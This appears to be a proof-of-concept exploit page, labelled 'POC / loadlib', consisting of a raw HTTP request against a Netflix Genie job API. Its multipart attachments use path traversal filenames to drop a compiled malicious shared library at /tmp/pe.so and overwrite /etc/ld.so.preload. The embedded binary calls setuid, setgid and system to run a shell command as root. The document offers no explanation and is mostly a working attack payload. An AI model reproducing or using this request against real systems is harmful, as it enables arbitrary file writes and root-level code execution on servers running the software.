4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / loadlib
POST /api/v3/jobs HTTP/1.1
Accept: */*
Transfer-Encoding: chunked
Content-Type: multipart/form-data; boundary=YTbzkpsuHTkekQb8CivWiacrmh8__e5
Host: localhost:1500
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.14 (Java/17.0.5)
Accept-Encoding: gzip,deflate

3ab
--YTbzkpsuHTkekQb8CivWiacrmh8__e5
Content-Disposition: form-data; name="request"
Content-Type: application/json; charset=US-ASCII
Content-Transfer-Encoding: 8bit

{"id":null,"created":null,"updated":null,"version":"1.0","user":"genie","name":"List * ... Directories bash job","description":"Genie 3 Test Job","metadata":null,"tags":[],"configs":[],"dependencies":[],"setupFile":"file:/Users/joebeeton/workspace/it/genie/genie-web/build/resources/integTest/com/netflix/genie/web/apis/rest/v3/controllers/JobRestControllerIntegrationTests/job/jobsetupfile","commandArgs":"-c 'sleep 5 && echo hello world'","clusterCriterias":[{"tags":["localhost"]}],"commandCriteria":["bash"],"group":null,"disableLogArchival":true,"email":null,"cpu":null,"memory":null,"timeout":null,"applications":[],"grouping":null,"groupingInstance":null,"runtime":{"resources":{"cpu":null,"gpu":null,"memoryMb":null,"diskMb":null,"networkMbps":null},"images":{}}}
10f1

--YTbzkpsuHTkekQb8CivWiacrmh8__e5
Content-Disposition: form-data; name="attachment"; filename="../../../../../../../../../../../../../../../../../../tmp/pe.so"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

ELF>`@@4@8	@��   �.�>�>���.�>�>@@888$$P�td� � � Q�tdR�td�.�>�>@@GNUo��\C�8ϨԸ�ߝ��Z	>@���#	`S_initunlinksetgidsetuidprintfsystemlibc.so.6GLIBC_2.2.5*ui	4@ @(@0@8@
1000
�50�%0@�%0h����%�/h�����%�/h����%�/h����%�/h���UH��H�=���������������H�=y����H�=}�p����]�
1000
/etc/ld.so.preloadHACK HACK HAK/bin/bash -c "echo 'I executed a arbitrary command as root to generate this text'>/tmp/command.out";t�T��4zRx���SA�C
N <�`FJw�?;*3$"*`���o`0�
@@x����o����o�op
900
�>&6FVGCC: (Debian 10.2.1-6) 10.2.1 202101108`�0p��	`
 � � 
�>@��
�>� "@8K^q��	`Spe.c_DYNAMIC__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE_unlink@GLIBC_2.2.5system@GLIBC_2.2.5printf@GLIBC_2.2.5setgid@GLIBC_2.2.5setuid@GLIBC_2.2.5_init.symtab.strtab.shstrtab.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.plt.text.rodata.eh_frame_hdr.eh_frame.dynamic.got.plt.comment88$.���o``$8���@00@H���oppU���o�� dB��xi`n``St  �|� � �� � \��>�.@�@0@�0@0'h0�	�2��3�
104

--YTbzkpsuHTkekQb8CivWiacrmh8__e5
Content-Disposition: form-data; name="attachment"; filename="../../../../../../../../../../../../../../../../../../etc/ld.so.preload"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

/tmp/pe.so

27

--YTbzkpsuHTkekQb8CivWiacrmh8__e5--

0